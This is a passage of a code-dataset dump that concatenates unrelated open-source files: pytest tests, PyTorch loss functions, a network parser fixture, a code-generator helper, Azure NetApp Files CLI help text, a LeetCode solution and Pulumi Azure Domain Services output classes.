'3.3.2')], ['spam'], ), ( [Package('eggs', '1.2.3'), Package('eggs', '3.2.1.5'), Package('eggs', '3.4')], ['eggs'], ), ]) def test_check_multi_minor_release_fail(pkgs, expect_to_flag_pkgs): with pytest.raises(aos_version.FoundMultiRelease) as e: aos_version._check_multi_minor_release(pkgs, expected_pkgs) assert set(expect_to_flag_pkgs) == set(e.value.problem_pkgs)
chrome/test/mini_installer/verifier_runner.py
kjthegod/chromium
2,151
61555
# Copyright 2013 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. import file_verifier import process_verifier import registry_verifier class VerifierRunner: """Runs all Verifiers.""" def __init__(self): """Constructor.""" # TODO(sukolsak): Implement other verifiers self._verifiers = { 'Files': file_verifier.FileVerifier(), 'Processes': process_verifier.ProcessVerifier(), 'RegistryEntries': registry_verifier.RegistryVerifier(), } def VerifyAll(self, property, variable_expander): """Verifies that the current machine states match the property dictionary. A property dictionary is a dictionary where each key is a verifier's name and the associated value is the input to that verifier. For details about the input format for each verifier, take a look at http://goo.gl/1P85WL Args: property: A property dictionary. variable_expander: A VariableExpander object. """ for verifier_name, verifier_input in property.iteritems(): if verifier_name not in self._verifiers: raise KeyError('Unknown verifier %s' % verifier_name) self._verifiers[verifier_name].VerifyInput(verifier_input, variable_expander)
src/quicknlp/callbacks.py
jalajthanaki/quick-nlp
287
61563
from fastai.sgdr import Callback class CVAELossCallback(Callback): pass
modules/functional/loss.py
Masterchef365/pvcnn
477
61564
import torch import torch.nn.functional as F __all__ = ['kl_loss', 'huber_loss'] def kl_loss(x, y): x = F.softmax(x.detach(), dim=1) y = F.log_softmax(y, dim=1) return torch.mean(torch.sum(x * (torch.log(x) - y), dim=1)) def huber_loss(error, delta): abs_error = torch.abs(error) quadratic = torch.min(abs_error, torch.full_like(abs_error, fill_value=delta)) losses = 0.5 * (quadratic ** 2) + delta * (abs_error - quadratic) return torch.mean(losses)
src/genie/libs/parser/iosxe/tests/ShowPlatformHardwareQfpStatisticsDrop/cli/equal/golden_output_active_expected.py
balmasea/genieparser
204
61635
<reponame>balmasea/genieparser expected_output = { "global_drop_stats": { "Ipv4NoAdj": {"octets": 296, "packets": 7}, "Ipv4NoRoute": {"octets": 7964, "packets": 181}, "PuntPerCausePolicerDrops": {"octets": 184230, "packets": 2003}, "UidbNotCfgd": {"octets": 29312827, "packets": 466391}, "UnconfiguredIpv4Fia": {"octets": 360, "packets": 6}, } }
generator/transformers/common_producer.py
jordynmackool/sdl_java_suite
138
61644
<reponame>jordynmackool/sdl_java_suite<gh_stars>100-1000 """ Common transformation """ import logging import re from abc import ABC from collections import namedtuple, OrderedDict from model.array import Array from model.enum import Enum from model.struct import Struct class InterfaceProducerCommon(ABC): """ Common transformation """ version = '1.0.0' def __init__(self, container_name, enums_package, structs_package, package_name, enum_names=(), struct_names=(), key_words=()): self.logger = logging.getLogger('Generator.InterfaceProducerCommon') self.container_name = container_name self.enum_names = enum_names self.struct_names = struct_names self.key_words = key_words self.enums_package = enums_package self.structs_package = structs_package self.package_name = package_name self._params = namedtuple('params', 'deprecated description key last mandatory origin return_type since title ' 'param_doc name') @property def get_version(self): return self.version @property def params(self): """ :return: namedtuple params(name='', origin='') """ return self._params @staticmethod def key(param: str): """ Convert param string to uppercase and inserting underscores :param param: camel case string :return: string in uppercase with underscores """ if re.match(r'^[A-Z_\d]+$', param): return param else: result = re.sub(r'([a-z]|[A-Z]{2,})([A-Z]|\d$)', r'\1_\2', param).upper() result = re.sub('IDPARAM', 'ID_PARAM', result) return result @staticmethod def ending_cutter(n: str): """ If string not contains only uppercase letters and end with 'ID' deleting 'ID' from end of string :param n: string to evaluate and deleting 'ID' from end of string :return: if match cut string else original string """ if re.match(r'^\w+[a-z]+([A-Z]{2,})?ID$', n): return n[:-2] else: return n @staticmethod def extract_description(d): """ Extract description :param d: list with description :return: evaluated string """ return re.sub(r'(\s{2,}|\n)', ' ', ''.join(d)).strip() if d else '' @staticmethod def extract_values(param): p = OrderedDict() if hasattr(param.param_type, 'min_size'): p['array_min_size'] = param.param_type.min_size if hasattr(param.param_type, 'max_size'): p['array_max_size'] = param.param_type.max_size if hasattr(param, 'default_value'): if hasattr(param.default_value, 'name'): p['default_value'] = param.default_value.name else: p['default_value'] = param.default_value elif hasattr(param.param_type, 'default_value'): if hasattr(param.param_type.default_value, 'name'): p['default_value'] = param.param_type.default_value.name else: p['default_value'] = param.param_type.default_value if hasattr(param.param_type, 'min_value'): p['num_min_value'] = param.param_type.min_value elif hasattr(param.param_type, 'element_type') and hasattr(param.param_type.element_type, 'min_value'): p['num_min_value'] = param.param_type.element_type.min_value if hasattr(param.param_type, 'max_value'): p['num_max_value'] = param.param_type.max_value elif hasattr(param.param_type, 'element_type') and hasattr(param.param_type.element_type, 'max_value'): p['num_max_value'] = param.param_type.element_type.max_value if hasattr(param.param_type, 'min_length'): p['string_min_length'] = param.param_type.min_length elif hasattr(param.param_type, 'element_type') and hasattr(param.param_type.element_type, 'min_length'): p['string_min_length'] = param.param_type.element_type.min_length if hasattr(param.param_type, 'max_length'): p['string_max_length'] = param.param_type.max_length elif hasattr(param.param_type, 'element_type') and hasattr(param.param_type.element_type, 'max_length'): p['string_max_length'] = param.param_type.element_type.max_length # Filter None values filtered_values = {k: v for k, v in p.items() if v is not None} return filtered_values @staticmethod def replace_sync(name): """ :param name: string with item name :return: string with replaced 'sync' to 'Sdl' """ if name: return re.sub(r'^([sS])ync(.+)$', r'\1dl\2', name) return name def replace_keywords(self, name: str = '') -> str: """ if :param name in self.key_words, :return: name += 'Param' :param name: string with item name """ if any(map(lambda k: re.search(r'^(get|set|key_)?{}$'.format(name.casefold()), k), self.key_words)): origin = name if name.isupper(): name += '_PARAM' else: name += 'Param' self.logger.debug('Replacing %s with %s', origin, name) return self.replace_sync(name) def extract_type(self, param): """ Evaluate and extract type :param param: sub-element Param of element from initial Model :return: string with sub-element type """ def evaluate(t1): if isinstance(t1, Struct) or isinstance(t1, Enum): name = t1.name return name else: return type(t1).__name__ if isinstance(param.param_type, Array): return 'List<{}>'.format(evaluate(param.param_type.element_type)) else: return evaluate(param.param_type)
tests/sample7args.py
anki-code/python-hunter
707
61645
from __future__ import print_function def one(a=123, b='234', c={'3': [4, '5']}): for i in range(1): # one a = b = c['side'] = 'effect' two() def two(a=123, b='234', c={'3': [4, '5']}): for i in range(1): # two a = b = c['side'] = 'effect' three() def three(a=123, b='234', c={'3': [4, '5']}): for i in range(1): # three a = b = c['side'] = 'effect' four() def four(a=123, b='234', c={'3': [4, '5']}): for i in range(1): # four a = b = c['side'] = 'effect' five() def five(a=123, b='234', c={'3': [4, '5']}): six() six() six() a = b = c['side'] = in_five = 'effect' for i in range(1): # five return i # five def six(): pass if __name__ == "__main__": from hunter import * from utils import DebugCallPrinter trace( Backlog(stack=15, vars=True, action=DebugCallPrinter(' [' 'backlog' ']'), function='five').filter(~Q(function='six')), action=DebugCallPrinter ) one() one() # make sure Backlog is reusable (doesn't have storage side-effects) stop()
test/com/facebook/buck/cli/testdata/run-command/cmd/echo_var.py
Unknoob/buck
8,027
61670
from __future__ import absolute_import, division, print_function, unicode_literals import os print("VAR is '{}'".format(os.environ["VAR"]))
src/chapter-4/test_ids.py
luizyao/pytest-chinese-doc
283
61699
<gh_stars>100-1000 #!/usr/bin/env python3 # -*- coding:utf-8 -*- ''' Author: <NAME> (<EMAIL>) Created Date: 2019-10-04 7:05:16 ----- Last Modified: 2019-10-04 7:29:59 Modified By: <NAME> (<EMAIL>) ----- THIS PROGRAM IS FREE SOFTWARE, IS LICENSED UNDER MIT. A short and simple permissive license with conditions only requiring preservation of copyright and license notices. Copyright © 2019 <NAME> ----- HISTORY: Date By Comments ---------- -------- --------------------------------------------------------- ''' import pytest @pytest.fixture(params=[0, 1], ids=['spam', 'ham']) def a(request): return request.param def test_a(a): pass def idfn(fixture_value): if fixture_value == 0: return "eggs" elif fixture_value == 1: return False elif fixture_value == 2: return None else: return fixture_value @pytest.fixture(params=[0, 1, 2, 3], ids=idfn) def b(request): return request.param def test_b(b): pass class C: pass @pytest.fixture(params=[(1, 2), {'d': 1}, C()]) def c(request): return request.param def test_c(c): pass
src/netappfiles-preview/azext_netappfiles_preview/_help.py
Mannan2812/azure-cli-extensions
207
61751
<filename>src/netappfiles-preview/azext_netappfiles_preview/_help.py # coding=utf-8 # -------------------------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for license information. # -------------------------------------------------------------------------------------------- from knack.help_files import helps # pylint: disable=line-too-long helps['netappfiles'] = """ type: group short-summary: Manage Azure NetApp Files (ANF) Resources. """ # account helps['netappfiles account'] = """ type: group short-summary: Manage Azure NetApp Files (ANF) Account Resources. """ helps['netappfiles account create'] = """ type: command short-summary: Create a new Azure NetApp Files (ANF) account. Note that active directory can only be applied to an existing account (using set/update). parameters: - name: --account-name -a -n type: string short-summary: The name of the ANF account - name: --tags type: string short-summary: A list of space separated tags to apply to the account examples: - name: Create an ANF account text: > az netappfiles account create -g group --account-name name -l location """ helps['netappfiles account set'] = """ type: command short-summary: Sets the tags or the active directory details for a specified ANF account. Sets the active directory property to exactly what is provided. If none is provided then the active directory is removed, i.e. provide empty []. parameters: - name: --account-name -a -n type: string short-summary: The name of the ANF account - name: --tags type: string short-summary: A list of space separated tags to apply to the account - name: --active-directories type: string short-summary: An array of active directory (AD) settings in json format. Limitation one AD/subscription. Consists of the fields username (Username of Active Directory domain administrator), password (Plain text password of Active Directory domain administrator), domain (Name of the Active Directory domain), dns (Comma separated list of DNS server IP addresses for the Active Directory domain), smb_server_name (NetBIOS name of the SMB server. This name will be registered as a computer account in the AD and used to mount volumes. Must be 10 characters or less), organizational_unit (The Organizational Unit (OU) within the Windows Active Directory) examples: - name: Update the tags and active directory of an ANF account text: > az netappfiles account set -g group --account-name name --tags 'key[=value] key[=value]' --active-directories '[{"username": "aduser", "password": "<PASSWORD>", "smbservername": "SMBSERVER", "dns": "192.168.3.11", "domain": "westcentralus"}]' -l westus2 - name: Remove the active directory from the ANF account text: > az netappfiles account set -g group --account-name name --active-directories '[]' -l westus2 """ helps['netappfiles account update'] = """ type: command short-summary: Set/modify the tags or the active directory details for a specified ANF account. Active directory settings are appended only - if none are present no change is made otherwise the active directory is replaced with that provided. parameters: - name: --account-name -a -n type: string short-summary: The name of the ANF account - name: --tags type: string short-summary: A list of space separated tags to apply to the account - name: --active-directories type: string short-summary: An array of active directory (AD) settings in json format. Limitation one AD/subscription. Consists of the fields username (Username of Active Directory domain administrator), password (Plain text password of Active Directory domain administrator), domain (Name of the Active Directory domain), dns (Comma separated list of DNS server IP addresses for the Active Directory domain), smb_server_name (NetBIOS name of the SMB server. This name will be registered as a computer account in the AD and used to mount volumes. Must be 10 characters or less), organizational_unit (The Organizational Unit (OU) within the Windows Active Directory) examples: - name: Update the tags and active directory of an ANF account text: > az netappfiles account update -g group --account-name name --tags 'key[=value] key[=value]' --active-directories '[{"username": "aduser", "password": "<PASSWORD>", "smbservername": "SMBSERVER", "dns": "192.168.3.11", "domain": "westcentralus"}]' -l westus2 """ helps['netappfiles account delete'] = """ type: command short-summary: Delete the specified ANF account. parameters: - name: --account-name -a -n type: string short-summary: The name of the ANF account examples: - name: Delete an ANF account text: > az netappfiles account delete -g group --account-name name """ helps['netappfiles account list'] = """ type: command short-summary: List ANF accounts. examples: - name: List ANF accounts within a resource group text: > az netappfiles account list -g group """ helps['netappfiles account show'] = """ type: command short-summary: Get the specified ANF account. parameters: - name: --account-name -a -n type: string short-summary: The name of the ANF account examples: - name: Get an ANF account text: > az netappfiles account show -g group --account-name name """ # pools helps['netappfiles pool'] = """ type: group short-summary: Manage Azure NetApp Files (ANF) Pool Resources. """ helps['netappfiles pool create'] = """ type: command short-summary: Create a new Azure NetApp Files (ANF) pool. parameters: - name: --account-name -a type: string short-summary: The name of the ANF account - name: --pool-name -n -p type: string short-summary: The name of the ANF pool - name: --size type: integer short-summary: The size for the ANF pool. Must be in 4 tebibytes increments, expressed in bytes - name: --service-level type: string short-summary: The service level for the ANF pool ["Standard"|"Premium"|"Extreme"] - name: --tags type: string short-summary: A list of space separated tags to apply to the pool examples: - name: Create an ANF pool text: > az netappfiles pool create -g group --account-name aname --pool-name pname -l location --size 4398046511104 --service-level "Premium" """ helps['netappfiles pool update'] = """ type: command short-summary: Update the tags of the specified ANF pool. parameters: - name: --account-name -a type: string short-summary: The name of the ANF account - name: --pool-name -n -p type: string short-summary: The name of the ANF pool - name: --size type: integer short-summary: The size for the ANF pool. Must be in 4 tebibytes increments, expressed in bytes - name: --service-level type: string short-summary: The service level for the ANF pool ["Standard"|"Premium"|"Extreme"] - name: --tags type: string short-summary: A list of space separated tags to apply to the pool examples: - name: Update specific values for an ANF pool text: > az netappfiles pool update -g group --account-name aname --pool-name pname --service-level "Extreme" --tags 'key[=value] key[=value]' """ helps['netappfiles pool delete'] = """ type: command short-summary: Delete the specified ANF pool. parameters: - name: --account-name -a type: string short-summary: The name of the ANF account - name: --pool-name -n -p type: string short-summary: The name of the ANF pool examples: - name: Delete an ANF pool text: > az netappfiles pool delete -g group --account-name aname --pool-name pname """ helps['netappfiles pool list'] = """ type: command short-summary: L:ist the ANF pools for the specified account. parameters: - name: --account-name -a -n type: string short-summary: The name of the ANF account examples: - name: List the pools for the ANF account text: > az netappfiles pool list -g group --account-name name """ helps['netappfiles pool show'] = """ type: command short-summary: Get the specified ANF pool. parameters: - name: --account-name -a type: string short-summary: The name of the ANF account - name: --pool-name -n -p type: string short-summary: The name of the ANF pool examples: - name: Get an ANF pool text: > az netappfiles pool show -g group --account-name aname --pool-name pname """ # volumes helps['netappfiles volume'] = """ type: group short-summary: Manage Azure NetApp Files (ANF) Volume Resources. """ helps['netappfiles volume create'] = """ type: command short-summary: Create a new Azure NetApp Files (ANF) volume. parameters: - name: --account-name -a type: string short-summary: The name of the ANF account - name: --pool-name -p type: string short-summary: The name of the ANF pool - name: --volume-name -n -v type: string short-summary: The name of the ANF volume - name: --service-level type: string short-summary: The service level ["Standard"|"Premium"|"Extreme"] - name: --usage-threshold type: int short-summary: The maximum storage quota allowed for a file system in bytes. Min 100 GiB, max 100TiB" - name: --creation-token type: string short-summary: A unique file path identifier, from 1 to 80 characters - name: --subnet-id type: string short-summary: The subnet identifier - name: --tags type: string short-summary: A list of space separated tags to apply to the volume - name: --export-policy type: string short-summary: A json list of the parameters for export policy containing rule_index (Order index), unix_read_only (Read only access), unix_read_write (Read and write access), cifs (Allows CIFS protocol), nfsv3 (Allows NFSv3 protocol), nfsv4 (Allows NFSv4 protocol) and allowedClients (Client ingress specification as comma separated string with IPv4 CIDRs, IPv4 host addresses and host names) examples: - name: Create an ANF volume text: > az netappfiles volume create -g group --account-name aname --pool-name pname --volume-name vname -l location --service-level "Premium" --usage-threshold 107374182400 --creation-token "<PASSWORD>" --subnet-id "/subscriptions/mysubsid/resourceGroups/myrg/providers/Microsoft.Network/virtualNetworks/myvnet/subnets/default" --export-policy '[{"allowed_clients":"0.0.0.0/0", "rule_index": "1", "unix_read_only": "true", "unix_read_write": "false", "cifs": "false", "nfsv3": "true", "nfsv3": "true", "nfsv4": "false"}]' """ helps['netappfiles volume update'] = """ type: command short-summary: Update the specified ANF volume with the values provided. Unspecified values will remain unchanged. parameters: - name: --account-name -a type: string short-summary: The name of the ANF account - name: --pool-name -p type: string short-summary: The name of the ANF pool - name: --volume-name -n -v type: string short-summary: The name of the ANF volume - name: --service-level type: string short-summary: The service level ["Standard"|"Premium"|"Extreme"] - name: --usage-threshold type: int short-summary: The maximum storage quota allowed for a file system in bytes. Min 100 GiB, max 100TiB" - name: --tags type: string short-summary: A list of space separated tags to apply to the volume - name: --export-policy type: string short-summary: A json list of the parameters for export policy containing rule_index (Order index), unix_read_only (Read only access), unix_read_write (Read and write access), cifs (Allows CIFS protocol), nfsv3 (Allows NFSv3 protocol), nfsv4 (Allows NFSv4 protocol) and allowedClients (Client ingress specification as comma separated string with IPv4 CIDRs, IPv4 host addresses and host names) examples: - name: Create an ANF volume text: > az netappfiles volume update -g group --account-name aname --pool-name pname --volume-name vname --service-level level --usage-threshold 107374182400 --tags 'key[=value] key[=value]' --export-policy '[{"allowed_clients":"1.2.3.0/24", "rule_index": "1", "unix_read_only": "true", "unix_read_write": "false", "cifs": "false", "nfsv3": "true", "nfsv3": "true", "nfsv4": "false"}, {"allowed_clients":"1.2.4.0/24", "rule_index": "2", "unix_read_only": "true", "unix_read_write": "false", "cifs": "false", "nfsv3": "true", "nfsv3": "true", "nfsv4": "false"}]' """ helps['netappfiles volume delete'] = """ type: command short-summary: Delete the specified ANF volume. parameters: - name: --account-name -a type: string short-summary: The name of the ANF account - name: --pool-name -p type: string short-summary: The name of the ANF pool - name: --volume-name -n -v type: string short-summary: The name of the ANF volume examples: - name: Delete an ANF volume text: > az netappfiles volume delete -g group --account-name aname --pool-name pname --volume-name vname """ helps['netappfiles volume list'] = """ type: command short-summary: List the ANF Pools for the specified account. parameters: - name: --account-name -a type: string short-summary: The name of the ANF account - name: --pool-name -n -p type: string short-summary: The name of the ANF pool examples: - name: List the ANF volumes of the pool text: > az netappfiles volume list -g group --account-name aname --pool-name pname """ helps['netappfiles volume show'] = """ type: command short-summary: Get the specified ANF volume. parameters: - name: --account-name -a type: string short-summary: The name of the ANF account - name: --pool-name -p type: string short-summary: The name of the ANF pool - name: --volume-name -n -v type: string short-summary: The name of the ANF pool examples: - name: Returns the properties of the given ANF volume text: > az netappfiles volume show -g group --account-name aname --pool-name pname --volume-name vname """ # mounttargets helps['netappfiles mount-target'] = """ type: group short-summary: Manage Azure NetApp Files (ANF) Mount Target Resources. """ helps['netappfiles mount-target list'] = """ type: command short-summary: List the mount targets of an ANF volume. parameters: - name: --account-name -a type: string short-summary: The name of the ANF account - name: --pool-name -p type: string short-summary: The name of the ANF pool - name: --volume-name -v type: string short-summary: The name of the ANF pool examples: - name: list the mount targets of an ANF volume text: > az netappfiles mount-target list -g group --account-name aname --pool-name pname --volume-name vname """ # snapshots helps['netappfiles snapshot'] = """ type: group short-summary: Manage Azure NetApp Files (ANF) Snapshot Resources. """ helps['netappfiles snapshot create'] = """ type: command short-summary: Create a new Azure NetApp Files (ANF) snapshot. parameters: - name: --account-name -a type: string short-summary: The name of the ANF account - name: --pool-name -p type: string short-summary: The name of the ANF pool - name: --volume-name -v type: string short-summary: The name of the ANF volume - name: --snapshot-name -n -s type: string short-summary: The name of the ANF snapshot - name: --file-system-id type: string short-summary: The uuid of the volume examples: - name: Create an ANF snapshot text: > az netappfiles snapshot create -g group --account-name account-name --pool-name pname --volume-name vname --snapshot-name sname -l location --file-system-id volume-uuid """ helps['netappfiles snapshot delete'] = """ type: command short-summary: Delete the specified ANF snapshot. parameters: - name: --account-name -a type: string short-summary: The name of the ANF account - name: --pool-name -p type: string short-summary: The name of the ANF pool - name: --volume-name -v type: string short-summary: The name of the ANF volume - name: --snapshot-name -n -s type: string short-summary: The name of the ANF snapshot examples: - name: Delete an ANF snapshot text: > az netappfiles snapshot delete -g group --account-name aname --pool-name pname --volume-name vname --snapshot-name sname """ helps['netappfiles snapshot list'] = """ type: command short-summary: List the snapshots of an ANF volume. parameters: - name: --account-name -a type: string short-summary: The name of the ANF account - name: --pool-name -p type: string short-summary: The name of the ANF pool - name: --volume-name -n -v type: string short-summary: The name of the ANF volume examples: - name: list the snapshots of an ANF volume text: > az netappfiles snapshot list -g group --account-name aname --pool-name pname --volume-name vname """ helps['netappfiles snapshot show'] = """ type: command short-summary: Get the specified ANF snapshot. parameters: - name: --account-name -a type: string short-summary: The name of the ANF account - name: --pool-name -p type: string short-summary: The name of the ANF pool - name: --volume-name -v type: string short-summary: The name of the ANF volume - name: --snapshot-name -n -s type: string short-summary: The name of the ANF snapshot examples: - name: Return the specified ANF snapshot text: > az netappfiles snapshot show -g group --account-name aname --pool-name pname --volume-name vname --snapshot-name sname """
coding_interviews/leetcode/easy/lucky_numbers_in_a_matrix/lucky_numbers_in_a_matrix.py
LeandroTk/Algorithms
205
61779
<gh_stars>100-1000 # https://leetcode.com/problems/lucky-numbers-in-a-matrix def lucky_numbers(matrix): all_lucky_numbers, all_mins = [], [] for row in matrix: found_min, col_index = float('Inf'), -1 for index, column in enumerate(row): if column < found_min: found_min = column col_index = index all_mins.append([found_min, col_index]) for a_min in all_mins: [min_value, min_column] = a_min maximum = float('-Inf') for index in range(len(matrix)): num = matrix[index][min_column] maximum = max(num, maximum) if maximum == min_value: all_lucky_numbers.append(min_value) return all_lucky_numbers
sdk/python/pulumi_azure/domainservices/outputs.py
henriktao/pulumi-azure
109
61800
<gh_stars>100-1000 # coding=utf-8 # *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. *** # *** Do not edit by hand unless you're certain you know what you are doing! *** import warnings import pulumi import pulumi.runtime from typing import Any, Mapping, Optional, Sequence, Union, overload from .. import _utilities __all__ = [ 'ServiceInitialReplicaSet', 'ServiceNotifications', 'ServiceSecureLdap', 'ServiceSecurity', 'GetServiceNotificationResult', 'GetServiceReplicaSetResult', 'GetServiceSecureLdapResult', 'GetServiceSecurityResult', ] @pulumi.output_type class ServiceInitialReplicaSet(dict): @staticmethod def __key_warning(key: str): suggest = None if key == "subnetId": suggest = "subnet_id" elif key == "domainControllerIpAddresses": suggest = "domain_controller_ip_addresses" elif key == "externalAccessIpAddress": suggest = "external_access_ip_address" elif key == "serviceStatus": suggest = "service_status" if suggest: pulumi.log.warn(f"Key '{key}' not found in ServiceInitialReplicaSet. Access the value via the '{suggest}' property getter instead.") def __getitem__(self, key: str) -> Any: ServiceInitialReplicaSet.__key_warning(key) return super().__getitem__(key) def get(self, key: str, default = None) -> Any: ServiceInitialReplicaSet.__key_warning(key) return super().get(key, default) def __init__(__self__, *, subnet_id: str, domain_controller_ip_addresses: Optional[Sequence[str]] = None, external_access_ip_address: Optional[str] = None, id: Optional[str] = None, location: Optional[str] = None, service_status: Optional[str] = None): """ :param str subnet_id: The ID of the subnet in which to place the initial replica set. :param Sequence[str] domain_controller_ip_addresses: A list of subnet IP addresses for the domain controllers in the initial replica set, typically two. :param str external_access_ip_address: The publicly routable IP address for the domain controllers in the initial replica set. :param str id: The ID of the Domain Service. :param str location: The Azure location where the Domain Service exists. Changing this forces a new resource to be created. :param str service_status: The current service status for the initial replica set. """ pulumi.set(__self__, "subnet_id", subnet_id) if domain_controller_ip_addresses is not None: pulumi.set(__self__, "domain_controller_ip_addresses", domain_controller_ip_addresses) if external_access_ip_address is not None: pulumi.set(__self__, "external_access_ip_address", external_access_ip_address) if id is not None: pulumi.set(__self__, "id", id) if location is not None: pulumi.set(__self__, "location", location) if service_status is not None: pulumi.set(__self__, "service_status", service_status) @property @pulumi.getter(name="subnetId") def subnet_id(self) -> str: """ The ID of the subnet in which to place the initial replica set. """ return pulumi.get(self, "subnet_id") @property @pulumi.getter(name="domainControllerIpAddresses") def domain_controller_ip_addresses(self) -> Optional[Sequence[str]]: """ A list of subnet IP addresses for the domain controllers in the initial replica set, typically two. """ return pulumi.get(self, "domain_controller_ip_addresses") @property @pulumi.getter(name="externalAccessIpAddress") def external_access_ip_address(self) -> Optional[str]: """ The publicly routable IP address for the domain controllers in the initial replica set. """ return pulumi.get(self, "external_access_ip_address") @property @pulumi.getter def id(self) -> Optional[str]: """ The ID of the Domain Service. """ return pulumi.get(self, "id") @property @pulumi.getter def location(self) -> Optional[str]: """ The Azure location where the Domain Service exists. Changing this forces a new resource to be created. """ return pulumi.get(self, "location") @property @pulumi.getter(name="serviceStatus") def service_status(self) -> Optional[str]: """ The current service status for the initial replica set. """ return pulumi.get(self, "service_status") @pulumi.output_type class ServiceNotifications(dict): @staticmethod def __key_warning(key: str): suggest = None if key == "additionalRecipients": suggest = "additional_recipients" elif key == "notifyDcAdmins": suggest = "notify_dc_admins" elif key == "notifyGlobalAdmins": suggest = "notify_global_admins" if suggest: pulumi.log.warn(f"Key '{key}' not found in ServiceNotifications. Access the value via the '{suggest}' property getter instead.") def __getitem__(self, key: str) -> Any: ServiceNotifications.__key_warning(key) return super().__getitem__(key) def get(self, key: str, default = None) -> Any: ServiceNotifications.__key_warning(key) return super().get(key, default) def __init__(__self__, *, additional_recipients: Optional[Sequence[str]] = None, notify_dc_admins: Optional[bool] = None, notify_global_admins: Optional[bool] = None): """ :param Sequence[str] additional_recipients: A list of additional email addresses to notify when there are alerts in the managed domain. :param bool notify_dc_admins: Whether to notify members of the _AAD DC Administrators_ group when there are alerts in the managed domain. :param bool notify_global_admins: Whether to notify all Global Administrators when there are alerts in the managed domain. """ if additional_recipients is not None: pulumi.set(__self__, "additional_recipients", additional_recipients) if notify_dc_admins is not None: pulumi.set(__self__, "notify_dc_admins", notify_dc_admins) if notify_global_admins is not None: pulumi.set(__self__, "notify_global_admins", notify_global_admins) @property @pulumi.getter(name="additionalRecipients") def additional_recipients(self) -> Optional[Sequence[str]]: """ A list of additional email addresses to notify when there are alerts in the managed domain. """ return pulumi.get(self, "additional_recipients") @property @pulumi.getter(name="notifyDcAdmins") def notify_dc_admins(self) -> Optional[bool]: """ Whether to notify members of the _AAD DC Administrators_ group when there are alerts in the managed domain. """ return pulumi.get(self, "notify_dc_admins") @property @pulumi.getter(name="notifyGlobalAdmins") def notify_global_admins(self) -> Optional[bool]: """ Whether to notify all Global Administrators when there are alerts in the managed domain. """ return pulumi.get(self, "notify_global_admins") @pulumi.output_type class ServiceSecureLdap(dict): @staticmethod def __key_warning(key: str): suggest = None if key == "pfxCertificate": suggest = "pfx_certificate" elif key == "pfxCertificatePassword": suggest = "pfx_certificate_password" elif key == "certificateExpiry": suggest = "certificate_expiry" elif key == "certificateThumbprint": suggest = "certificate_thumbprint" elif key == "externalAccessEnabled": suggest = "external_access_enabled" elif key == "publicCertificate": suggest = "public_certificate" if suggest: pulumi.log.warn(f"Key '{key}' not found in ServiceSecureLdap. Access the value via the '{suggest}' property getter instead.") def __getitem__(self, key: str) -> Any: ServiceSecureLdap.__key_warning(key) return super().__getitem__(key) def get(self, key: str, default = None) -> Any: ServiceSecureLdap.__key_warning(key) return super().get(key, default) def __init__(__self__, *, enabled: bool, pfx_certificate: str, pfx_certificate_password: str, certificate_expiry: Optional[str] = None, certificate_thumbprint: Optional[str] = None, external_access_enabled: Optional[bool] = None, public_certificate: Optional[str] = None): """ :param bool enabled: Whether to enable secure LDAP for the managed domain. Defaults to `false`. :param str pfx_certificate: The certificate/private key to use for LDAPS, as a base64-encoded TripleDES-SHA1 encrypted PKCS#12 bundle (PFX file). :param str pfx_certificate_password: The password to use for decrypting the PKCS#12 bundle (PFX file). :param bool external_access_enabled: Whether to enable external access to LDAPS over the Internet. Defaults to `false`. """ pulumi.set(__self__, "enabled", enabled) pulumi.set(__self__, "pfx_certificate", pfx_certificate) pulumi.set(__self__, "pfx_certificate_password", pfx_certificate_password) if certificate_expiry is not None: pulumi.set(__self__, "certificate_expiry", certificate_expiry) if certificate_thumbprint is not None: pulumi.set(__self__, "certificate_thumbprint", certificate_thumbprint) if external_access_enabled is not None: pulumi.set(__self__, "external_access_enabled", external_access_enabled) if public_certificate is not None: pulumi.set(__self__, "public_certificate", public_certificate) @property @pulumi.getter def enabled(self) -> bool: """ Whether to enable secure LDAP for the managed domain. Defaults to `false`. """ return pulumi.get(self, "enabled") @property @pulumi.getter(name="pfxCertificate") def pfx_certificate(self) -> str: """ The certificate/private key to use for LDAPS, as a base64-encoded TripleDES-SHA1 encrypted PKCS#12 bundle (PFX file). """ return pulumi.get(self, "pfx_certificate") @property @pulumi.getter(name="pfxCertificatePassword") def pfx_certificate_password(self) -> str: """ The password to use for decrypting the PKCS#12 bundle (PFX file). """ return pulumi.get(self, "pfx_certificate_password") @property @pulumi.getter(name="certificateExpiry") def certificate_expiry(self) -> Optional[str]: return pulumi.get(self, "certificate_expiry") @property @pulumi.getter(name="certificateThumbprint") def certificate_thumbprint(self) -> Optional[str]: return pulumi.get(self, "certificate_thumbprint") @property @pulumi.getter(name="externalAccessEnabled") def external_access_enabled(self) -> Optional[bool]: """ Whether to enable external access to LDAPS over the Internet. Defaults to `false`. """ return pulumi.get(self, "external_access_enabled") @property @pulumi.getter(name="publicCertificate") def public_certificate(self) -> Optional[str]: return pulumi.get(self, "public_certificate") @pulumi.output_type class ServiceSecurity(dict): @staticmethod def __key_warning(key: str): suggest = None if key == "ntlmV1Enabled": suggest = "ntlm_v1_enabled" elif key == "syncKerberosPasswords": suggest = "sync_kerberos_passwords" elif key == "syncNtlmPasswords": suggest = "sync_ntlm_passwords" elif key == "syncOnPremPasswords": suggest = "sync_on_prem_passwords" elif key == "tlsV1Enabled": suggest = "tls_v1_enabled" if suggest: pulumi.log.warn(f"Key '{key}' not found in ServiceSecurity. Access the value via the '{suggest}' property getter instead.") def __getitem__(self, key: str) -> Any: ServiceSecurity.__key_warning(key) return super().__getitem__(key) def get(self, key: str, default = None) -> Any: ServiceSecurity.__key_warning(key) return super().get(key, default) def __init__(__self__, *, ntlm_v1_enabled: Optional[bool] = None, sync_kerberos_passwords: Optional[bool] = None, sync_ntlm_passwords: Optional[bool] = None, sync_on_prem_passwords: Optional[bool] = None, tls_v1_enabled: Optional[bool] = None): """ :param bool ntlm_v1_enabled: Whether to enable legacy NTLM v1 support. Defaults to `false`. :param bool sync_kerberos_passwords: Whether to synchronize Kerberos password hashes to the managed domain. Defaults to `false`. :param bool sync_ntlm_passwords: Whether to synchronize NTLM password hashes to the managed domain. Defaults to `false`. :param bool sync_on_prem_passwords: Whether to synchronize on-premises password hashes to the managed domain. Defaults to `false`. :param bool tls_v1_enabled: Whether to enable legacy TLS v1 support. Defaults to `false`. 